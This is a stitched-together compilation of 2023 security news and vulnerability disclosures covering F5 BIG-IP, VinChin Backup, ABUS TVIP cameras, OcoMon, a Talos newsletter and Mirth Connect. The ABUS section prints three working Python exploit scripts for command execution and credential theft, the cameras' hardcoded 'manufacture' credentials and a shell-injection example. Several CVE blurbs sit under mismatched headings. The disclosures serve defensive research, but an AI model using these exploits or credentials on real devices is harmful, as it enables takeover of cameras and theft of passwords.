F5 has alerted customers of a critical security vulnerability impacting BIG-IP that could result in unauthenticated remote code execution.
The issue, rooted in the configuration utility component, has been assigned the CVE identifier CVE-2023-46747, and carries a CVSS score of 9.8 out of a maximum of 10.
"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP

Network Security / Vulnerability

F5 has alerted customers of a critical security vulnerability impacting BIG-IP that could result in unauthenticated remote code execution.

The issue, rooted in the configuration utility component, has been assigned the CVE identifier **CVE-2023-46747**, and carries a CVSS score of 9.8 out of a maximum of 10.

"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands," F5 said in an advisory released Thursday. "There is no data plane exposure; this is a control plane issue only."

The following versions of BIG-IP have been found to be vulnerable -

*   17.1.0 (Fixed in 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG)
*   16.1.0 - 16.1.4 (Fixed in 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG)
*   15.1.0 - 15.1.10 (Fixed in 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG)
*   14.1.0 - 14.1.5 (Fixed in 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG)
*   13.1.0 - 13.1.5 (Fixed in 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG)

As mitigations, F5 has also made available a shell script for users of BIG-IP versions 14.1.0 and later. "This script must not be used on any BIG-IP version prior to 14.1.0 or it will prevent the Configuration utility from starting," the company warned.

Other temporary workarounds available for users are below -

*   Block Configuration utility access through self IP addresses
*   Block Configuration utility access through the management interface

Michael Weber and Thomas Hendrickson of Praetorian have been credited with discovering and reporting the vulnerability on October 4, 2023.

The cybersecurity company, in a technical report of its own, described CVE-2023-46747 as an authentication bypass issue that can lead to a total compromise of the F5 system by executing arbitrary commands as root on the target system, noting it's "closely related to CVE-2022-26377."

Praetorian is also recommending that users restrict access to the Traffic Management User Interface (TMUI) from the internet. It's worth noting that CVE-2023-46747 is the third unauthenticated remote code execution flaw uncovered in TMUI after CVE-2020-5902 and CVE-2022-1388.

"A seemingly low impact request smuggling bug can become a serious issue when two different services offload authentication responsibilities onto each other," the researchers said. "Sending requests to the 'backend' service that assumes the 'frontend' handled authentication can lead to some interesting behavior."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

F5 Issues Warning: BIG-IP Vulnerability Allows Remote Code Execution

VinChin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.* was discovered to contain hardcoded credentials.

Sun Oct 15, 2023 by BloodyShell in  vulnerability, research, LeakIX  vulnerability, research, LeakIX

**Vulnerability research**

At LeakIX we analyse new vulnerabilities discovered by other researchers every day.

Our goal is to understand them, discover non-intrusive ways to detect them and provide our customers with a list of vulnerable assets.

While researching what others have already found is always an exciting challenge and provides valuable experience, it was time for us to go through the research and disclosure process first hand and get our first CVE on the board.

We decided to look for issues in critical software. It was natural for us to select the “Infrastructure Backup” category. Such software will hold an entire organisation’s data but also credentials to critical points of the network, including:

*   Servers
*   Hypervisors
*   Storage
*   Cloud accounts

**VinChin Backup**

VinChin Backup & Recovery is an **all-in-one backup solution for virtual infrastructures** supporting VMWare, KVM, Xen Server, Hyper-V, OpenStack and more. The product also supports AWS, Azure and other cloud providers as backup storage.

It is used by companies like Sony, Guizhou Power Grid, and while its main market is located in Asia, it has decent adoption on other continents and protects over 10,000 clients.

**CVE-2023-45499**

During our research we discovered an HTTP API exposed by VinChin Backup. This API can be accessed using hard-coded credentials.

The privileges granted are high since ACLs are bypassed for this authentication method.

The list of actions available from the API includes:

*   View/Edit/Add/Delete storage
*   View/Delete backups
*   View/Edit/Add/Delete jobs
*   View/Edit/Add/Delete cloud accounts
*   View/Edit/Add/Delete hypervisors
*   View/Edit/Add/Delete users
*   Query various information such as:
    *   Services status
    *   System information
    *   Licensing

The list is non-exhaustive.

**CVE-2023-45498**

While exploring the various functionalities exposed by the API a particular endpoint was found vulnerable to improper input sanitization. A specially crafted payload results in remote code execution allowing the attacker to execute code with the permissions of the web server.

**Demo**

**Affected versions**

During our routine scans we identified vulnerable products starting from 5.0 up until the last known version.

**IOC**

Any requests made to /api/ from an untrusted IP should be considered suspicious. The log can be found in /var/log/nginx/access.log.

**Mitigation**

At this point VinChin has not acknowledged the issue despite our multiple requests, we can only recommend to remove all exposed instances from untrusted network.

**Timeline**

    2023-09-22: LeakIX makes initial contact
    2023-09-25: VinChin request details
    2023-09-25: LeakIX request Safe harbour
    2023-09-26: No reply, LeakIX requests update
    2023-09-27: No reply, LeakIX sends PoC
    2023-09-29: No reply, LeakIX requests feedback
    2023-10-05: No reply, LeakIX requests feedback
    2023-10-10: No reply, LeakIX requests feedback from alternative email
    2023-10-11: No reply, LeakIX requests feedback from another alternative email
    2023-10-16: No reply, CVE reserved and vendor notified
    2023-10-18: No reply, LeakIX sent 7 day disclosure warning
    2023-10-24: LeakIX sends early warning to providers hosting VinChin on their network.
    2023-10-26: No reply, Publishing this advisory

CVE-2023-45499: CVE-2023-45498: RCE in VinChin Backup

Due to incorrect access control, unauthenticated remote attackers can view the /video.mjpg video stream of certain ABUS TVIP cameras.

**Background⌗**

It was a chill friday evening when Ilias, Alexander and myself sat around our local hackspace Chaosdorf, ate some pizza and played around with the ABUS security camera we were able to get in our hands shortly before. As the company has quite some reputation in Germany, we assumed that there wouldn’t be much to find security-wise, also because this camera was one of the most expensive ones in the consumer market. Little did we know that we’d get our first CVEs and security fame that evening as well…

**Objective⌗**

> August Bremicker und Söhne KG, commonly known as ABUS, is a German manufacturer of preventative security technology based in Wetter, North Rhine-Westphalia.
> 
> *   Wikipedia

While ABUS is mostly focusing on physical security technology like door locks and chains, security cameras are also an important branch of their portfolio. Those cameras are bought from a white-label producer, branded and sold. In this case, the affected cameras were produced by taiwanese producer Grain Media with the GM812X chipset.

This means that the discovered vulnerabilities were not necessarily ABUS’ fault, as they didn’t develop the firmware. They could’ve conducted penetration tests though.

Affected by the vulnerabilities are the model numbers / lines:

*   Compact Cameras
    *   TVIP10000
    *   TVIP10001
    *   TVIP10005
    *   TVIP10005A
    *   TVIP10005B
    *   TVIP10050
    *   TVIP10051
    *   TVIP10055A
    *   TVIP10055B
    *   TVIP10500
    *   TVIP10550
    *   TVIP11000
    *   TVIP11050
    *   TVIP11500
    *   TVIP11501
    *   TVIP11502
    *   TVIP11550
    *   TVIP11551
    *   TVIP11552
*   Cameras with movable head
    *   TVIP20000
    *   TVIP20050
    *   TVIP20500
    *   TVIP20550
    *   TVIP21000
    *   TVIP21050
    *   TVIP21500
    *   TVIP21501
    *   TVIP21502
    *   TVIP21550
    *   TVIP21551
    *   TVIP21552
    *   TVIP22500
*   Dome cameras
    *   TVIP31000
    *   TVIP31001
    *   TVIP31050
    *   TVIP31500
    *   TVIP31501
    *   TVIP31550
    *   TVIP31551
    *   TVIP32500
*   Box cameras
    *   TVIP51500
    *   TVIP51550
*   Outside dome cameras
    *   TVIP71500
    *   TVIP71501
    *   TVIP71550
    *   TVIP71551
    *   TVIP72500

Those cameras were sold from 2010 to 2014.

**Timeline⌗**

*   XX-09-2018: Discovery of vulnerabilities in lab environment
*   XX-09-2018: Communication with CCC e.V. for disclosure handling
*   26-11-2018: Initial contact with ABUS, no response
*   18-02-2019: Start of responsible disclosure process with ABUS
*   03-05-2019: Public Announcement by ABUS for a replacement program
*   07-05-2019: Publication of CCC blogpost

This disclosure was picked up by German press shortly after: Heise, Golem, SPIEGEL Online

**Vulnerabilities⌗****CVE-2018-16739⌗**

Authenticated read and write access through directory traversal with command execution

**Description⌗**

Through directory traversal it is possible to utilize the file browser of the web frontend, which seems to be only for displaying file server content, for arbitrary read, write and execution. The browser can be used to read and write files outside the file server directory and to list the contents of any directory. This is done with root privileges.

The affected endpoints are:

*   /cgi-bin/admin/fileread?READ.filePath=<Path> to read the specified file
*   /cgi-bin/admin/filewrite?SAVE.filePath=<Path> to write to the specified file
*   /cgi-bin/admin/sdstate?action=filelistnas&directory=<Path> to list a directory

**Exploitation⌗**

For arbitrary read and write, the exploitation of the endpoints is as simple as it gets, by prefixing the desired path with ../../../../ or by specifying an absolute path.

A trick is required to move from arbitrary write to code execution: if a bash script is placed in the CGI scripts folder of the web server and this script is called via a web browser, the shell script is executed with root privileges. This is also the trick applied on the POC exploit:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import random
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-16739")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        referenceID = random.randint(1000, 9999)
    
        print(huepy.cyan("[~] Exploit for CVE-2018-16739"))
        print(huepy.cyan("    Your reference number is %i." % (referenceID)))
    
        prepareShell(args.url, referenceID, args.cmd)
        execCmd(args.url, referenceID)
        readCmd(args.url, referenceID)
        mrproper(args.url, referenceID)
    
    
    def prepareShell(target, refID, cmd):
        writeCmd(target, refID, "#!/bin/sh\n%s 1>/tmp/%i.log 2>&1" % (cmd, refID))
    
    
    def writeCmd(target, refID, cmd):
        percentCmd = urllib.parse.quote(cmd)
        print(huepy.yellow("[~] writing /opt/cgi/admin/%i.sh" % (refID)))
        r = requests.get("%s/cgi-bin/admin/filewrite?SAVE.filePath=/opt/cgi/admin/%i.sh&SAVE.fileData=%s" % (target, refID, percentCmd), verify=False)
    
    
    def execCmd(target, refID):
        print(huepy.yellow("[~] Executing reference number %i..." % (refID)))
        r = requests.get("%s/cgi-bin/admin/%i.sh" % (target, refID), verify=False)
    
    
    def readCmd(target, refID):
        r = requests.get("%s/cgi-bin/admin/fileread?READ.filePath=/tmp/%i.log" % (target, refID), verify=False)
        print(huepy.green("[+] Command returned on %i:\n" % (refID)) +  r.text)
    
    
    def mrproper(target, refID):
        print(huepy.green("[+] mrproper-ing your waste..."))
        writeCmd(target, refID, "#!/bin/sh\nrm /tmp/%i.log /opt/cgi/admin/%i.sh" % (refID, refID))
        execCmd(target, refID)
    
    
    if __name__ == '__main__':
        main()
    

Note that, as the OS injection itself is blind, log output of your command(s) needs to be written into a log file and read again after the command finishes. This means that if your command runs for an hour, you’ll only be able to get the output after an hour.

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17558⌗**

Hardcoded administrator account with code execution as root

**Description⌗**

The web server is protected against unauthorized access by a user name and password, which can be changed by the person who purchased the camera. This is admin:12345 or admin:admin by default, dependent on software and model. This is dangerous in itself, since an attacker can exploit the fact that the owner of the camera usually does not change this password.

Regardless of the initial values for the admin user account, the web server is also configured to accept the user name manufacture with the password erutcafunam for the /cgi-bin/mft directory in the web server’s root directory. These values cannot be deleted by the owner of the camera, nor can they be changed. This means that all cameras running with the affected software versions can be accessed using this user name and password.

There are several endpoints in the /cgi-bin/mft directory. These endpoints are responsible for changing the WiFi settings of the device. These can be attacked at various points through an OS injection to execute code with root privileges:

**Evaluation⌗**

If the manufacture user account is combined with the input attack, it is possible to execute arbitrary code as root on the camera from outside, even if the owner of the camera has chosen secure passwords. These are simply bypassed.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:C/A:C = Base Score **10.0**

**Exploitation⌗**

Obviously, using the hard-coded credentials for your purposes is as easy as it gets.

Bringing together the puzzle pieces “hardcoded credentials” and “OS injection” gives you endless possibilities; one of them is to leak out the (user-managed) credentials:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    import base64
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17558")
        parser.add_argument('ip', type=str, help='target IP, eg 127.0.0.1')
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17558"))
    
        copyCreds(args.ip) and showCreds(args.ip) and delCreds(args.ip)
    
    
    def copyCreds(target):
        print(huepy.yellow("[~] Copying creds"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;cp%%20/var/www/secret.passwd%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL!"))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def showCreds(target):
        print(huepy.yellow("[~] Here are the credentials of %s" % (target)))
        r = requests.get("http://%s/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL! Here you go:"))
            print("Rights\t\t| Password\t|")
            for line in r.text.split("\n"):
                if "0000" in line:
                    parts = line.split(" ")
                    print("%s\t| %s\t|" % (parts[0], base64.b64decode(parts[1]).decode("utf-8")))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def delCreds(target):
        print(huepy.yellow("[~] Cleaning up"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;rm%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] Successful. Thanks for your cooperation."))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    if __name__ == '__main__':
        main()
    

**CVE-2018-17879⌗**

Remote code execution through OS injection

**Description⌗**

The /cgi-bin/ directory contains several scripts that are used to control and configure the camera. Among other tasks, these scripts are responsible for changes to the camera’s image settings (contrast, color values, brightness) or the network settings of the device. The attack is based on the fact that some of the scripts do not check input that comes from the user and are passed directly to the system() command. If control characters are used to spoof the user input, arbitrary C ode can be executed. For example, such an input could look like this: $(shutdown -h now). This would shut down the camera from the outside. An attacker could use this to completely take over the camera, attack the internal network (private or corporate), launch further attacks from the camera, as well as change, pause or delete the camera’s image, and completely disable the camera.

**Exploitation⌗**

As simple as wrapping a reverse shell code in $(...).

See this exploit, where the injection happens in the UPnP HTTP Port field:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17879")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17879"))
    
        execCmd(args.url, args.cmd)
    
    
    def execCmd(target, command):
        print(huepy.green("[~] Executing command '%s'..." % (command)))
        percentCommand = urllib.parse.quote(command)
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1%%3e/dev/null%%202%%3e/dev/null;%s;false" % (target, percentCommand), verify=False)
        print(r.text[:-3])
        print(huepy.yellow("[~] Cleaning up..."))
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1337" % (target), verify=False)
    
    
    if __name__ == '__main__':
        main()
    

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17878⌗**

Remote code execution through buffer overflows

**Description⌗**

Almost all of the CGI scripts used by the web server take user input to know what to do. The function that is internally responsible for copying this input is sprintf(). This function is vulnerable to a buffer overflow. This allows an attacker, by typing in a specially crafted string, to write over the memory allocated to it, and thus gain complete control of the program and achieve code execution as root.

**Exploitation⌗**

Depending on the binary, buffer size and stack; as no security protections like stack canaries or NX / Data Execution Prevention are in place, this could be easily done via either Shellcode or ROP.

**Evaluation⌗**

CVSS v2: AV:N/AC:H/Au:S/C:C/I:C/A:C = Base Score **7.1**

**CVE-2018-17559⌗**

Access control bypass

**Description⌗**

The web server gets the camera feed from the CGI script /opt/cgi/jpg/image. This script delivers the current frame every second. This script is symlinked to many places in the file system. Among others to /cgi-bin/admin/image, /cgi-bin/admin/image.jpg, /tmp/video.mp4, /cgi-bin/operator/image.jpg.

Most of these endpoints are password protected in the configuration file of the webserver, boa.conf. However, on lines 314-321 it can be seen that after the script and the symlinks to the script are password protected, they are transferred somewhere else again, and these new endpoints are not password protected:

    # boa.conf, L314-321
    Auth /cgi-bin/jpg /var/www/secret.passwd
    
    # [...]
    
    Transfer /video.mp4 /tmp/video.mp4
    Transfer /video.3gp /tmp/video.mp4
    Transfer /video.mjpg /tmp/video.mp4
    Transfer /video.h264 /tmp/video.mp4
    

This results in an attacker accessing /video.mp4 or /video.mjpg being able to view the video feed without the need to authenticate.

**Exploitation⌗**

Access /video.mp4 or /video.mjpg to see the video feed without authentication.

**Evaluation⌗**

As the video stream is the most important output of a security camera, being able to circumvent the protection of the video stream is critical, especially taking into consideration what direction and perspective the camera is facing.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:N/A:N = Base Score **7.8**

**Overall Evaluation & Conclusion⌗**

An attacker can completely take over the camera, attack the internal network (private or company network), launch further attacks from the camera, change or delete the image of the camera, or completely disable the camera, as well as put the camera completely out of operation. This could be particularly problematic in security-critical scenarios, e.g., criminal acts that are recorded and documented by the camera, as evidence could be lost.

While the replacement program may give end users new cameras (which are hopefully not prone to the security issues described here, but I didn’t test that), the risk of having a always-on security device with weak hardware and network access persists. Please put such devices in a separate network or VLAN, protect it with firewall rules, and avoid credential reusage. Reviewing if you really need cameras connected to the internet could be another important step in becoming more secure.

CVE-2018-17559: Five Vulnerabilities in ABUS cameras

Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.

CVE-2018-17558: Five Vulnerabilities in ABUS cameras

An issue was discovered on certain ABUS TVIP cameras. The CGI scripts allow remote attackers to execute code via system() as root. There are several injection points in various scripts.

CVE-2018-17879: Five Vulnerabilities in ABUS cameras

Buffer Overflow vulnerability in certain ABUS TVIP cameras allows attackers to gain control of the program via crafted string sent to sprintf() function.

CVE-2018-17878: Five Vulnerabilities in ABUS cameras

An information disclosure vulnerability in the component users-grid-data.php of Ocomon before v4.0.1 allows attackers to obtain sensitive information such as e-mails and usernames.

**OcoMon Research****OcoMon < 4.0RC1 - Account Takeover \[CVE-2022-40798\]**

Through password recovery its possible to obtain a token to reset password of any user.

**OcoMon < 4.0.1 - User enumeration \[CVE-2023-33558\]**

The vulnerability allows the attacker to obtain information such as Email, Username of the OcoMon users.

**OcoMon < 4.0.1 - File Inclusion allow Remote Code Execution \[CVE-2023-33559\]**

The vulnerability allows an authenticated user to change the language setting by passing a valid file path, the code will include the file and in some environments will execute malicious code.

**Fix**

https://ocomonphp.sourceforge.io/downloads/

CVE-2023-33558: GitHub - ninj4c0d3r/OcoMon-Research

An issue in Mintty v.3.6.4 and before allows a remote attacker to execute arbitrary code via crafted commands to the terminal.

CVE-2023-39726: "[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

New YoroTrooper research, the latest on the Cisco IOS vulnerability, and more.

Thursday, October 26, 2023 14:10

Coming from the newspaper and media industry, I’m no stranger to wanting to write catchy headlines. I’m certainly at fault for throwing together a story about so-and-sos house sold for X million dollars.  

But recently I’ve been wondering if those “big numbers” for cybersecurity are helpful at all, even though they might generate clicks to a news organization. 

I saw several media outlets had reported on a new estimate from commercial insurance market Lloyd's of London that a cyber attack on any international global payments systems could cost $3.5 trillion globally, hurting many major world economies. 

At face value, that seems bad, and it’s a number that’s sure to come up with board rooms or any place decision-makers meet to discuss cybersecurity. 

It likely catches the eye of readers at home who are skimming newspaper headlines (if you’re like my dad and one of the last people who still reads physical newspapers).  

But what use is actually throwing these types of numbers out there? It reminds me of the discussion around climate change or any other problem that seems larger than life. I tend to not dwell on the worst-case scenario reports that always come out and make headlines because I feel these have a tendency to make people feel defeated — like there is no purpose in trying to make a difference because the problem is so overwhelming that one individual contribution won’t matter anyway, so then we all sit by and do nothing. 

If every time there is a major cyber attack, and we shame the targeted company by pointing out how many millions of dollars they lost, it’s just another form of public shaming that I’ve written about before that can lead to a stigma around disclosing cyber attacks. 

That Lloyd’s of London report is far from the first of its kind, these kinds of numbers pop up all the time, especially at the end of the calendar year when outlets want to write stories about how much cyber attacks cost consumers that year (there were estimates ranging from $7 billion to $10 billion in 2022). 

To me, numbers like this only contribute to fear, uncertainty and doubt (FUD) in the cybersecurity space. A small business owner who sees cybersecurity as a trillion-dollar problem to be solved by world governments isn’t going to see implementing a better password on their store’s wireless router as anything that’s going to help, because the global economy is in a bad place anyway if one day everyone’s point-of-sale systems go down at once. 

I’m sure many of these reports and estimates are created in good faith by experts who know what they’re talking about, and on a grand scale, yes, it’s important to know how serious of a problem this is for everyone, no matter where you live in the world. 

But I think we’d all be better served spending time talking about ways to get easy cybersecurity wins rather than losing sleep over a global hack that may or may not ever happen. 

**The one big thing **

New Talos research shows that the YoroTrooper threat actor is likely operating out of Kazakhstan. Our latest blog post on this group outlines how they’re still expanding their spam operations and using Azerbaijan-related false flags to throw researchers off their scent. The threat actor also uses online exchanges, such as alfachange\[.\]com, which converts money from Kazakhstani Tenge to Bitcoin via their Visa and Mastercard cards. 

**Why do I care? **

YoroTrooper’s targeting appears to be focused on Commonwealth of Independent States (CIS) countries, and the operators have compromised multiple state-owned websites and accounts belonging to government officials of these countries between May and August 2023. Any organization that falls into that category should certainly be on the lookout, but since this actor has continued to operate for so long, it’s impossible to say where they’d pivot next. Talos believes that, in addition to commodity and custom malware, YoroTrooper continues to rely heavily on phishing emails that direct victims to credential harvesting sites. 

**So now what? **

Talos has an exhaustive list of new indicators of compromise that you can run against your network to check for any YoroTrooper activity. A new round of Snort rules and ClamAV signatures can also detect this activity, along with the many information-stealing malware that YoroTrooper tends to use in its campaigns.  

**Top security headlines of the week **

**AI tools like ChatGPT are getting increasingly good at writing malicious code and spam emails, two new studies found.** An internal study at IBM found that employees who were targeted with ChatGPT-written spam emails were just as likely to click on them as ones written by humans. The leader of the experiment said it only took her team about five minutes to get ChatGPT to write the spam email in question, despite workarounds in place to keep users from exploiting the chat bot for these types of uses. A separate study at the University of Sheffield released last week also found that, by asking ChatGPT and other AI applications for a certain series of prompts, they produced malicious code. When executed, that code would leak confidential database information, interrupt a database's normal service, or destroy it. That study specifically focused on Text-to-SQL systems, which is AI that allows users to search databases by asking questions in plain language. (Axios, TechXplore) 

**The alleged leader of the Ragnar Locker ransomware gang was arrested in Paris earlier this month.** Eleven law enforcement agencies teamed up to find the suspected developer and take down infrastructure associated with Ragnar Locker. Five additional suspects were interviewed in Spain and Latvia. Authorities seized the group’s leak site, as well, posting a takedown notice for victims, though no resources appear to be available yet for anyone looking to negotiate with the attackers or who are currently infected with Ragnar Locker. Ragnar Locker has been active since 2019, targeting the energy sector, hospitals, airports, and more. It utilized double extortion tactics, threatening to leak any stolen data if the ransom isn’t paid. For example, this resulted in the reveal of several video games under development by Capcom. (Dark Reading, CPO Magazine) 

**Attackers breached the network of software firm Okta, stealing access tokens and sitting on the company’s customer support platform for at least two weeks.** Okta said the attack only affected a few customers, but password management service 1Password said this week it was the target of a follow-on attack using the stolen tokens. However, 1Password said no customer login information was affected. Okta provides identity and login tools like multi-factor authentication and single sign-on to major companies across the globe. The disclosure from Okta came weeks after major cyber attacks on MGM Resorts and Caesar’s Entertainment, in which adversaries tricked Okta multi-factor authentication administrators into resetting requirements, which provided them easier access to the targeted networks at those casinos and hotels. (Krebs on Security, Ars Technica) 

**Can’t get enough Talos? **

*   Active exploitation of Cisco IOS XE Software Web Management User Interface vulnerabilities 
*   Attacks on web applications spike in third quarter, new Talos IR data shows 
*   The Need to Know: What is cracktivator software? 
*   9 vulnerabilities found in VPN software, including 1 critical issue that could lead to remote code execution 
*   Talos Takes Ep. #159: What happens when you actually click the "report spam" button?  

**Upcoming events where you can find Talos **

**Black Hat Middle East and Africa** **(Nov. 16)** 

Riyadh, Saudi Arabia 

> _Rami Atalhi from Talos Incident Response will discuss how generative AI affects red and blue teams in cybersecurity. Discover how generative AI creates a bridge between these teams, fostering teamwork and innovative strategies. Real-world cases will demonstrate how generative AI drives success, providing insights for building resilient cybersecurity plans._ 

**misecCON** **(Nov. 17)** 

Lansing, Michigan 

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** b9ddbd1a4cec61e6b022a275d66312b5b676f9a0a9537a7708de9aa8ce34de59   
**MD5:** 3b100bdcd61bb1da816cd7eaf9ef13ba   
**Typical Filename:** vt-upload-C6In1   
**Claimed Product:** N/A    
**Detection Name:** Backdoor:KillAV-tpd 

**SHA 256:** 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5   
**MD5:** 8c80dd97c37525927c1e549cb59bcbf3     
**Typical Filename:** Eternalblue-2.2.0.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Exploit.Shadowbrokers::5A5226262.auto.talos 

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934    
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c    
**VirusTotal:** Typical Filename: Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg 

**SHA 256:** 744c5a6489370567fd8290f5ece7f2bff018f10d04ccf5b37b070e8ab99b3241   
**MD5:** a5e26a50bf48f2426b15b38e5894b189   
**Typical Filename:** a5e26a50bf48f2426b15b38e5894b189.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Generic::1201 

**SHA 256: 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab**   
**MD5:** 4c648967aeac81b18b53a3cb357120f4   
**Typical Filename:** yypnexwqivdpvdeakbmmd.exe   
**Claimed Product:** N/A    
**Detection Name:** Win.Dropper.Scar::1201

How helpful are estimates about how much cyber attacks cost?

NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. This is a bypass of the patch put in for CVE-2023-37679.

**Summary**

Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability, CVE-2023-43208. If you’re a user of Mirth Connect, you’ll want to upgrade to the latest patch release, 4.4.1, as of this writing.

**Background**

A few months ago, we came across an unauthenticated remote code execution vulnerability, CVE-2023-37679, affecting Mirth Connect that was reported by IHTeam. Mirth Connect is an interesting application for us at Horizon3.ai because a number of our clients are in the healthcare space and use this application. Healthcare companies are commonly targeted by ransomware threat actors, and this application has decent exposure on the Internet (about 1200+ unique hosts).

 

CVE-2023-37679 was reported to be fixed in Mirth Connect 4.4.0. In the release notes for 4.4.0, it was reported as only affecting Mirth Connect installs running on Java 8 or below. This caught our attention (why only Java 8?), and we started digging. We found that in fact, all installs of Mirth Connect, regardless of the Java version, were vulnerable. We also found that the patch for CVE-2023-37679 could be bypassed. We subsequently reported a new vulnerability to NextGen, tracked as CVE-2023-43208. The fix for CVE-2023-43208 is in 4.4.1.

**Impact**

This is an easily exploitable, unauthenticated remote code execution vulnerability. Attackers would most likely exploit this vulnerability for initial access or to compromise sensitive healthcare data.

We are not releasing an exploit at this time, but the methods for exploitation (involving Java XStream) are well known and documented. We have verified that Mirth Connect versions going as far back as 2015/2016 are vulnerable.

On Windows systems, where Mirth Connect appears to be most commonly deployed, it typically runs as the SYSTEM user. Here’s an example of exploiting this vulnerability to run the ping command on a Windows host:

 

 

 

**Detection**

The version of the Mirth Connect server can be determined as follows:

% curl  -k -H 'X-Requested-With: OpenAPI' https://<server>:<port>/api/server/version  
4.4.0

Any server reporting a version less than 4.4.1 is highly likely to be exploitable.

**Remediation**

We urge all users of Mirth Connect, especially instances that are Internet-facing, to prioritize updating to 4.4.1 ASAP.

**Timeline**

*   **Sept. 8, 2023**: Horizon3.ai sends initial report to NextGen
*   **Sept. 8, 2023**: NextGen acknowledges receipt
*   **Oct. 6, 2023**: NextGen provides Horizon3.ai a test build for 4.4.1
*   **Oct. 13, 2023**: Horizon3.ai completes testing/review of test build
*   **Oct. 17, 2023**: NextGen releases 4.4.1
*   **Oct. 25, 2023**: This post

We’d like to thank NextGen for the prompt handling of this vulnerability, and a hat tip to IHTeam for discovering the original issue.

**References**

*   Mirth Connect on GitHub
*   Mirth Connect 4.4.1 Release Notes
*   CVE-2023-43208
*   IHTeam Advisory for CVE-2023-37679
*   CVE-2023-37679

**Sign up for a free trial and quickly verify you’re not exploitable.**

Start Your Free Trial

Tag

#rce